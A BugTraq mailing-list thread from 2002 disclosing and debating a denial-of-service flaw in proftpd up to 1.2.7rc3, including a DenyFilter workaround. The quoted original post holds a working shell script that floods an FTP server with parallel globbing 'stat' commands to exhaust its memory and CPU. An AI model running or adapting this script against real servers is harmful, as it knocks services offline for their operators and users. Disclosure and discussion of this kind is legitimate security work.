|
|
BugTraq
proftpd <=1.2.7rc3 DoS Dec 08 2002 12:53PM Rob klein Gunnewiek (rmkleing hio hen nl) (1 replies) Re: [VulnWatch] proftpd <=1.2.7rc3 DoS Dec 10 2002 07:44PM Kurt Seifried (listuser seifried org) (1 replies) |
|
Privacy Statement |
1. I know that the workaround with the DenyFilter works.
2. Proftpd by default doesn't have this filter set, neither has the
default proftpd install on slackware 8.1
3. The methods mentioned on the page you refer to do not work on later
proftpd versions (tested on 1.2.7rc3) because of limits set in the
code. i.e:
ftp> ls .*./*?/.*./*?/.*./*?/.*./*?/.*./
200 PORT command successful
150 Opening ASCII mode data connection for file list
226-Out of memory during globbing of .*./*?/.*./*?/.*./*?/.*./*?/.*./
226 Transfer complete.
ftp>
these proftpd versions don't even process that command.
I think I have done proper research on this issue before notifying anyone.
People should do more research before making any conclusions, it's far
less embarassing.
Rob.
On Tue, 10 Dec 2002, Kurt Seifried wrote:
> This is so old I can't even find any postings/articles I remember making on
> it. Here is one link from early last year:
>
> http://lwn.net/2001/0322/a/proftpd-dos.php3
>
> Check the documentation:
>
> DenyFilter \*.*/
>
> Problem solved.
>
> People should search Google before posting, it's far less embaressing.
>
> Kurt Seifried, kurt (at) seifried (dot) org [email concealed]
> A15B BEE5 B391 B9AD B0EF
> AEB0 AD63 0B4E AD56 E574
> http://seifried.org/security/
>
> ----- Original Message -----
> From: "Rob klein Gunnewiek" <rmkleing (at) hio.hen (dot) nl [email concealed]>
> To: <bugtraq (at) securityfocus (dot) com [email concealed]>; <vulnwatch (at) vulnwatch (dot) org [email concealed]>
> Sent: Sunday, December 08, 2002 4:53 AM
> Subject: [VulnWatch] proftpd <=1.2.7rc3 DoS
>
>
> > Hello,
> >
> > proftpd is vulnerable to denial of service similar to the list
> > */../*/../*/../*.
> >
> > #!/bin/sh
> > #
> > # proftpd <=1.2.7rc3 DoS - Requires anonymous/ftp login at least
> > # might work against many other FTP daemons
> > # consumes nearly all memory and alot of CPU
> > #
> > # tested against slackware 8.1 - proftpd 1.2.4 and 1.2.7rc3
> > #
> > # 7-dec-02 - detach - www.duho.org
> > #
> > # use: ./prodos.sh <host> <user> <pass>
> > # do this some more to make sure the system eventually dies
> >
> > cnt=25
> > while [ $cnt -gt 0 ] ; do
> > ftp -n << EOF&
> > o $1
> > quote user $2
> > quote pass $3
> > quote stat /*/*/*/*/*/*/*
> > quit
> > EOF
> > let cnt=cnt-1
> > done
> > sleep 2
> > killall -9 ftp
> > echo DONE!
> >
> > #end
> >
>
>
[ reply ]